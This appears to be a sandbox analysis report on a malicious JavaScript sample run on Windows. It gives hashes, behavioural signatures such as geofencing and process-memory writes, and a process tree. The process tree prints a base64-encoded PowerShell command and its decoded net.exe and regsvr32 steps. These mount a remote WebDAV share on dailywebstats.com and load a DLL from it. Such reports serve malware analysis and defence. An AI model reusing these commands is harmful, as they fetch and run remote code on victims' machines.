Analysis
-
max time kernel
134s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
25-07-2024 23:59
Static task
static1
Behavioral task
behavioral1
Sample
2828177702847225356.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2828177702847225356.js
Resource
win10v2004-20240709-en
General
-
Target
2828177702847225356.js
-
Size
18KB
-
MD5
cc6eacc372484d473e37249388eacffc
-
SHA1
761c3dea9a3d3f130d16b902f2bcc8bd8deb7df0
-
SHA256
a376365042371476cb9de4b251218f5bffafa5ac8912ddeaad5c5d964c92d679
-
SHA512
fd0af5c7ce4cc87f9b07ab6922bfd7e86a1354ca482733e9d73313f9365470ba25c43449850174acf064476d82ea2658c9a4e980af9675e7ee3cce19602b6df1
-
SSDEEP
384:YMC2+JbEhvok8sqqWDmWjWCw+7NxYXYICHTBbIWjWCw+7NxYXzXGbuOusn4:YMCJmQWGUNkTBMQWGUzW14
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation wscript.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1572 powershell.exe 1572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1572 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4864 wrote to memory of 1572 4864 wscript.exe 84 PID 4864 wrote to memory of 1572 4864 wscript.exe 84 PID 1572 wrote to memory of 2360 1572 powershell.exe 86 PID 1572 wrote to memory of 2360 1572 powershell.exe 86 PID 1572 wrote to memory of 1284 1572 powershell.exe 87 PID 1572 wrote to memory of 1284 1572 powershell.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2828177702847225356.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADIAMgA5ADkANwAzADYAMwAzADIAMwA0ADkANAAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2360
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\22997363323494.dll3⤵PID:1284
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82